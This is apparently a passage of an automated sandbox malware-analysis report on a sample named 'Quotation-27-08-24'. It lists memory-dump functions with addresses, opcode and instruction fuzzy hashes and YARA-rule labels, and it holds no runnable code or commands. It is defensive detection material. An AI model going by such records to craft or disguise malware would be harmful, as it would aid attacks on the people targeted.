                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3c5436510ba2eb0b68f8b075f0bdd78409c5c4f2d94fa208e151907d2c035d6e
                                          • Instruction ID: 04528ea53e197d4e10690ea94b62f286a83778ae21b7153c2bfc8cade7a44f14
                                          • Opcode Fuzzy Hash: 3c5436510ba2eb0b68f8b075f0bdd78409c5c4f2d94fa208e151907d2c035d6e
                                          • Instruction Fuzzy Hash: 90012D393507108FDB18DB29C8459AA33B6FBC9714B2901A9E102CF731DB76DC01C781
                                          Function 053BD338 Relevance: .0, Instructions: 43COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7044d8c3c3c6adda6959bef57228b226bd19e66791d908a13d6f4e22e68848a2
                                          • Instruction ID: 6fc2164110cbe24e83c9a3764e828f273bca5d4f40da6e34fc37140320e25aaa
                                          • Opcode Fuzzy Hash: 7044d8c3c3c6adda6959bef57228b226bd19e66791d908a13d6f4e22e68848a2
                                          • Instruction Fuzzy Hash: AFF0A430364211CBD62CA62DD454BBF77AEEFC9711F50496EEA0A87B94DEF19C0183A1
                                          Function 053B83B0 Relevance: .0, Instructions: 43COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2d718a4591fb4d4c768dc3d4ccd8a929789f4b6e38184666bd6f9c9e84d43f1f
                                          • Instruction ID: 2fa0cacf3564e71853a77ae09ef4755a6774800cfbc41810c4de111e0d48e515
                                          • Opcode Fuzzy Hash: 2d718a4591fb4d4c768dc3d4ccd8a929789f4b6e38184666bd6f9c9e84d43f1f
                                          • Instruction Fuzzy Hash: 9E018431600704CFD714EF35C450696BBB5EF85300F44856DDA468B660FFB0D845CB51
                                          Function 053B8778 Relevance: .0, Instructions: 42COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 271ebf6782f016676bd7ebf3c3f94b13fdd2e8a023d28cf1365f47e11a99da94
                                          • Instruction ID: e463ae114b437a15ae6c4fde1da9c62358a656511ec03778ff2c09122f91043b
                                          • Opcode Fuzzy Hash: 271ebf6782f016676bd7ebf3c3f94b13fdd2e8a023d28cf1365f47e11a99da94
                                          • Instruction Fuzzy Hash: D101AD35710B048BDB017BA8D41A6EEB73AFFC5211F00496DEA8667201EFB1A441C7D1
                                          Function 053BDF28 Relevance: .0, Instructions: 41COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 63ed5f32080c40c43642ed940a099867052e7ade8f3311fde680fc5476bf25d7
                                          • Instruction ID: 980d7d2a53b6e6f943913b46ce5046d8861bc022e28a2b6d477ede1bf79c41b8
                                          • Opcode Fuzzy Hash: 63ed5f32080c40c43642ed940a099867052e7ade8f3311fde680fc5476bf25d7
                                          • Instruction Fuzzy Hash: 20F0F4313542008BC61C9629D450FBB77AEAFC8611B54456EEA0AC7794DAB0A80183A1
                                          Function 053B6880 Relevance: .0, Instructions: 40COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 598e9355d2a42fc1a85f74ac3f4c1711a7fde54508506988518cd4a84527c99d
                                          • Instruction ID: 25d0865893d184cf1ea86faae4d806d28c744d15fd43b32cf8b18df71cd4f815
                                          • Opcode Fuzzy Hash: 598e9355d2a42fc1a85f74ac3f4c1711a7fde54508506988518cd4a84527c99d
                                          • Instruction Fuzzy Hash: A4F04C3A3107108FDB18DA2DC84186A33A6FBCA7103280299E112CF771CBB1DC01C780
                                          Function 053B4A60 Relevance: .0, Instructions: 40COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 35a38b9ac92c952f284b104764bd8f96ec4708999c9c6d16dda25864525e09e4
                                          • Instruction ID: 776154c299d9af42d8662404ef8450be6ebe959021687d59aeb28ecb9fe42141
                                          • Opcode Fuzzy Hash: 35a38b9ac92c952f284b104764bd8f96ec4708999c9c6d16dda25864525e09e4
                                          • Instruction Fuzzy Hash: 3DF0BB75B001289B9F05B7A898546FFBBBADBC8510B100429E719A7740DE718E128BD5
                                          Function 053B6AD8 Relevance: .0, Instructions: 40COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e05842ca34edab28574f5a21321ac8d468613fd6388a167d074562de70394fac
                                          • Instruction ID: af698f01971cc5fdaab5956cd7b72eca6f5e03655f179ca8b3327b891e577e79
                                          • Opcode Fuzzy Hash: e05842ca34edab28574f5a21321ac8d468613fd6388a167d074562de70394fac
                                          • Instruction Fuzzy Hash: 69F0BB3030611147FA14992A8856ABA72FEAFC05D17054069A607C7D51DEE0DD018761
                                          Function 053B8BC8 Relevance: .0, Instructions: 39COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 39ba97e2ff4f77df33eb1885dc4f95f2d9d02889bd80e5cadcceed9268089f2b
                                          • Instruction ID: 7f21fdcbfadf5a2b1989ae304b2fe634bfb65f0a6b0e845ddd089dc6d3fc0587
                                          • Opcode Fuzzy Hash: 39ba97e2ff4f77df33eb1885dc4f95f2d9d02889bd80e5cadcceed9268089f2b
                                          • Instruction Fuzzy Hash: 5AF0F6363406018FD7149F7AF840659BFE9EFC42257044A7EE14ECB621DEB0AC098780
                                          Function 053B87F9 Relevance: .0, Instructions: 38COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 359eda7a50b58956409cffae12f6108e933d8812f1fedbd3855205b6122f6ac1
                                          • Instruction ID: 16d0bbadfa2144fbb1f20a2df3cf2df21ef36cb03167b3c456b62434155bb3ac
                                          • Opcode Fuzzy Hash: 359eda7a50b58956409cffae12f6108e933d8812f1fedbd3855205b6122f6ac1
                                          • Instruction Fuzzy Hash: FDF0FC35300600CBC7269B1BE844A5AFBBAFFC8711F54055DE54687760DFB1AC42CB90
                                          Function 053B8788 Relevance: .0, Instructions: 37COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 812a7ddbbc878581d45c0afa7965308025b820267742fce70a68a33638e7d21f
                                          • Instruction ID: 9afb8681945fcf623b1806e0b2d0cf9a5806f2ae4410bc88c54e59d2759c95a1
                                          • Opcode Fuzzy Hash: 812a7ddbbc878581d45c0afa7965308025b820267742fce70a68a33638e7d21f
                                          • Instruction Fuzzy Hash: 4FF0C2357007088BDB117B74C41A4EEB77EEFC1210F00466DDA4667200EFB1A541C7D1
                                          Function 053B9028 Relevance: .0, Instructions: 37COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c232853cb510a45ff9e9c21a284925eb5592ae01e75a4c7e6b87f4de98ae57b9
                                          • Instruction ID: 0bfd78bcc8bb310f447f9364cf9e9fc18a5fcda4b4760f25276b918ace8da8df
                                          • Opcode Fuzzy Hash: c232853cb510a45ff9e9c21a284925eb5592ae01e75a4c7e6b87f4de98ae57b9
                                          • Instruction Fuzzy Hash: C20169312047808FC7169B28D8A8A557FF5EF4A705B0A44DAE58ACB372DB66FC04CB50
                                          Function 053B5E59 Relevance: .0, Instructions: 36COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a773902ac1915b1cedd4ac140f272ed7e8abbc2eb210292486d635ae82a99a08
                                          • Instruction ID: 84442670fe6b92e4b7539a8abecce5470626e695b80c44bb0ceabbf6bbaceb28
                                          • Opcode Fuzzy Hash: a773902ac1915b1cedd4ac140f272ed7e8abbc2eb210292486d635ae82a99a08
                                          • Instruction Fuzzy Hash: CF010831900609DFCB40EFA8C54599DBBF4FF49200B15859AE458EB321E7709A40CF81
                                          Function 053B6EA0 Relevance: .0, Instructions: 36COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9d90e09dd3092431300a8fd71fcb9027496d5555242611d4a3ab4dabcf1ab261
                                          • Instruction ID: b45b3d4b13dab99a0a9d1b688cbbfaf44d553b75a32561d241f970f5e49f10d0
                                          • Opcode Fuzzy Hash: 9d90e09dd3092431300a8fd71fcb9027496d5555242611d4a3ab4dabcf1ab261
                                          • Instruction Fuzzy Hash: 7CF0E2313041285BEF19AA39D4195BD769ABFC4A11B24402DD70ACBB92DFE6C802C780
                                          Function 053B8808 Relevance: .0, Instructions: 34COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 61cf6d031cc01338cb651e90df5683dabc4d564993d8a9858f3c8df73c2d6759
                                          • Instruction ID: 289dba79e684a7f1456909cc5d91bd1fb1e0e6dfd0ad269f8b419a8034d55a5d
                                          • Opcode Fuzzy Hash: 61cf6d031cc01338cb651e90df5683dabc4d564993d8a9858f3c8df73c2d6759
                                          • Instruction Fuzzy Hash: 5EF0B4313006008FC626AB1BE48495AFBBAFFC8225F00012DE50A87760CFB1AC42CB90
                                          Function 053B5E68 Relevance: .0, Instructions: 33COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e26b3b693c3fa3a092213b46d9974f97095fdf38ae2968b16eb170a88f8efb51
                                          • Instruction ID: 4243ceffdd30f352615e2fe6667d750750fc4abca0ae9b7f9b7c733986b7bd1f
                                          • Opcode Fuzzy Hash: e26b3b693c3fa3a092213b46d9974f97095fdf38ae2968b16eb170a88f8efb51
                                          • Instruction Fuzzy Hash: 0601B675D00609DFCB40EFACC54589DBBF4FF49210B1185AAE859EB321E770AA44CF91
                                          Function 053B9048 Relevance: .0, Instructions: 28COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3ed2bd8dc85662a3d049b77992775a0fab01098221e4fcd0eff3b2e0d5bf49c2
                                          • Instruction ID: ce081806af3ad1b493e305019f4349b8a1258e4d4129a5f5baaa916e4afde8af
                                          • Opcode Fuzzy Hash: 3ed2bd8dc85662a3d049b77992775a0fab01098221e4fcd0eff3b2e0d5bf49c2
                                          • Instruction Fuzzy Hash: FEF0DF31240610CFC718DB2CD598D997BEAFF4AB1971145A9E60ACB732CBB2EC40CB80
                                          Function 053B8861 Relevance: .0, Instructions: 25COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 695487d5e52ffb2538fab5bd02d59db8c1d1dd4f4dcdfe4fe93e3f9ceaf7fa98
                                          • Instruction ID: 448c854ea8e03f106b559bcbb77c145e28855d0fe5614d9c5889060b506cb922
                                          • Opcode Fuzzy Hash: 695487d5e52ffb2538fab5bd02d59db8c1d1dd4f4dcdfe4fe93e3f9ceaf7fa98
                                          • Instruction Fuzzy Hash: 85E0483221450157D225975AEC409CBB796EFD8750B504A2EE24D87634DFF09C4683D4
                                          Function 053B3EF8 Relevance: .0, Instructions: 24COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 46e26aa622aa84e30d03969ff4ccabcbe12332c181a179eb895449740f13ffd0
                                          • Instruction ID: 95b52c44e63e5083c2c215df85ee6d064c5244198cb48913ff505df10b5ae0d7
                                          • Opcode Fuzzy Hash: 46e26aa622aa84e30d03969ff4ccabcbe12332c181a179eb895449740f13ffd0
                                          • Instruction Fuzzy Hash: 32F06571A083469FDB01EFB1D9154997FB5FF42204711469AE444D76A2DB321F02D711
                                          Function 053B5346 Relevance: .0, Instructions: 23COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2233cf7ffedc188692700df1d6a5910960c15a361b99bef2bc4b7353c08a4f13
                                          • Instruction ID: a3fa1966cc8cd73cffa3b44f449ba8aba13e8c5095a8535263dd7a875878d147
                                          • Opcode Fuzzy Hash: 2233cf7ffedc188692700df1d6a5910960c15a361b99bef2bc4b7353c08a4f13
                                          • Instruction Fuzzy Hash: FBE04F7295125DDBEF109B81F6447FDFB71FB4521AF200522D256B5D50D7F10580CB91
                                          Function 053B6A50 Relevance: .0, Instructions: 23COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9ea84833c043eff30836e4e6a3bc50d624d303f307227e3448f4cdfc5d4d5c00
                                          • Instruction ID: 1d52928e58b7afaa38a4dcb8a79d7a83dfe9005e6d6592c138f7c9af5f11227c
                                          • Opcode Fuzzy Hash: 9ea84833c043eff30836e4e6a3bc50d624d303f307227e3448f4cdfc5d4d5c00
                                          • Instruction Fuzzy Hash: CBE04632210A009BC718CB4DF840A8977E9FB88712B2489AAF159C7660EEA1EC058780
                                          Function 053B0514 Relevance: .0, Instructions: 22COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8a5a23c0054960c6807a65afa958f49b255dd593d094bc50a54c6b08b5a974eb
                                          • Instruction ID: 94732e8d0723275447f23859bf3d9d0b898273bb045c6ced053ab5ac9da92905
                                          • Opcode Fuzzy Hash: 8a5a23c0054960c6807a65afa958f49b255dd593d094bc50a54c6b08b5a974eb
                                          • Instruction Fuzzy Hash: 58F03975A04108CFCB18EFE4D1495EDB7B5FB89311F2000AAD606BBA40DB729E00CB60
                                          Function 053B3F08 Relevance: .0, Instructions: 19COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 78657993f44254d9a673cb228693f069f6987a84a7b4b221d2e55a8021f3cae1
                                          • Instruction ID: 83b4bd8e19e9bcaf0d6368b5084b086033fb8befbcd29d5aee8391b5fb2744e3
                                          • Opcode Fuzzy Hash: 78657993f44254d9a673cb228693f069f6987a84a7b4b221d2e55a8021f3cae1
                                          • Instruction Fuzzy Hash: FBE08670A0020AEFCB00FFA6E90149D7BB9FB45308B204258E804A7315DB336F00DB50
                                          Function 053B6A60 Relevance: .0, Instructions: 19COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a9fae121d0e7919549dc559e3c092719f02f0ca4b42a11469b10c71b728bb930
                                          • Instruction ID: 39251ad9c1b5110af0f9942a6555c25666964627b1f3fbda84382bd9a9b5495e
                                          • Opcode Fuzzy Hash: a9fae121d0e7919549dc559e3c092719f02f0ca4b42a11469b10c71b728bb930
                                          • Instruction Fuzzy Hash: 44D017313146149F8728DA1CE840C9AB7EAEF8821032486A9F10AC7661DAA0EC054694
                                          Function 053BFF91 Relevance: .0, Instructions: 11COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 46565a798fb57ac5520df81e98c0e6a64af9e2ad05a85493bffb837afa63de2b
                                          • Instruction ID: c9a8deeb04a181632cc6447f67f2e97a749b3f2a7109c31fac33bac9f118a23b
                                          • Opcode Fuzzy Hash: 46565a798fb57ac5520df81e98c0e6a64af9e2ad05a85493bffb837afa63de2b
                                          • Instruction Fuzzy Hash: EBC0126020A3D2CFC302A73498048A62F30DE967103154293E284CB0A3D2284D6EC336

                                          Non-executed Functions

                                          Function 073F9048 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: lPi
                                          • API String ID: 0-3304780571
                                          • Opcode ID: 32fd547f66704da3f49f2dc2a231ba1bdfac49e4d4e54c1b066b120a9b1ed1d1
                                          • Instruction ID: 1d2a3c4d33c2b7ba6623b143ec601a6d04995f893ad18ef8e8334890bfaf490c
                                          • Opcode Fuzzy Hash: 32fd547f66704da3f49f2dc2a231ba1bdfac49e4d4e54c1b066b120a9b1ed1d1
                                          • Instruction Fuzzy Hash: 70E13DB4E042598FDB14DFA9C580AAEFBF2FF89304F248269D558A7355C731A942CF60
                                          Function 073FD420 Relevance: .4, Instructions: 376COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9e5b70f455d27c613bbe42ac59b32cfa0333285dce8facb1efe63ccf3ff80f8c
                                          • Instruction ID: 0839c721f036a0e0c2a71e98c95af0f94f841474354162800223e44221350784
                                          • Opcode Fuzzy Hash: 9e5b70f455d27c613bbe42ac59b32cfa0333285dce8facb1efe63ccf3ff80f8c
                                          • Instruction Fuzzy Hash: 32D1B0B17206019FE719EB76C4A4B6E77E6AF8A340F10446ED24ACB6A0DF35E901C752
                                          Function 05381818 Relevance: .3, Instructions: 315COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130747844.0000000005380000.00000040.00000800.00020000.00000000.sdmp, Offset: 05380000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5380000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3992c4e112f3083e731f0382db55eaef637388fe6f89b6babd9413e44c9a6cde
                                          • Instruction ID: d1bb4920bc46cb9e634a0e80d8baa60599d6043b6cc4ce224d8d3dc0f7daad9a
                                          • Opcode Fuzzy Hash: 3992c4e112f3083e731f0382db55eaef637388fe6f89b6babd9413e44c9a6cde
                                          • Instruction Fuzzy Hash: ED1262B14217458AE730CF66E94C1D97AB1BB85328BD08709D2616F2F9EBB415CBCF44
                                          Function 073F7500 Relevance: .3, Instructions: 312COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cf835beb16f11637e74d041fe9aac237f545b09dc45d2a7eeda7b91173f9008f
                                          • Instruction ID: 94da28dd697d557a5d1503e7f1030065316fc847d5ea41514d2a52d3568586c5
                                          • Opcode Fuzzy Hash: cf835beb16f11637e74d041fe9aac237f545b09dc45d2a7eeda7b91173f9008f
                                          • Instruction Fuzzy Hash: 45E14DB4E002598FDB14DFA9C580AAEFBF2FF89304F648269D558A7315D730A942CF60
                                          Function 073F9558 Relevance: .3, Instructions: 312COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2bf967eef2135a666c9394a011b5fe558cfa2dde9fb588292ec104c630560e60
                                          • Instruction ID: 02bafd00114e56e0ac5ffd7b36360590c90fb8b3e52326931c1fe048de5b4ab2
                                          • Opcode Fuzzy Hash: 2bf967eef2135a666c9394a011b5fe558cfa2dde9fb588292ec104c630560e60
                                          • Instruction Fuzzy Hash: 1EE12CB4E002598FDB14DFA9C580AAEFBF2FF89304F248259D548AB355D731A942CF60
                                          Function 073F70C8 Relevance: .3, Instructions: 312COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c79380ddce24c28fb0cc274628dd3cd0266292f5cd94ec83214e9f5019098f7b
                                          • Instruction ID: 766d8bbd847e20e8a3a8f5fa0008c54d141226e2e55cfc280e964ff871e37c30
                                          • Opcode Fuzzy Hash: c79380ddce24c28fb0cc274628dd3cd0266292f5cd94ec83214e9f5019098f7b
                                          • Instruction Fuzzy Hash: B4E14FB4E102698FDB14DFA9C580AAEFBF2FF89304F648259D518A7315D731A942CF60
                                          Function 073F6C90 Relevance: .3, Instructions: 312COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fb4c9d58b30342b4edc932bc1429fd5b74671f1ec111aa3a811f1aa781c76f65
                                          • Instruction ID: a17040d4196c1fe8671b12783131d7ac8a415d567935ea875ce8f323bcc9970a
                                          • Opcode Fuzzy Hash: fb4c9d58b30342b4edc932bc1429fd5b74671f1ec111aa3a811f1aa781c76f65
                                          • Instruction Fuzzy Hash: 73E12BB4E00259CFDB14DFA9C580AAEFBB2FF89304F248269D558A7355C731A942CF61
                                          Function 05380E58 Relevance: .3, Instructions: 260COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130747844.0000000005380000.00000040.00000800.00020000.00000000.sdmp, Offset: 05380000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5380000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0859734980f9bcc1725b26704c2b80c62d3b33735355eafb1eadfb68a96a419b
                                          • Instruction ID: 005b05bbad312d801312b9de10486471973acf223d115d10dfccb24bc7058eab
                                          • Opcode Fuzzy Hash: 0859734980f9bcc1725b26704c2b80c62d3b33735355eafb1eadfb68a96a419b
                                          • Instruction Fuzzy Hash: FFA19236A10306CFCF1ADFB5C8445AEB7B2FF94300B15457AE805AB265DB71E94ACB50
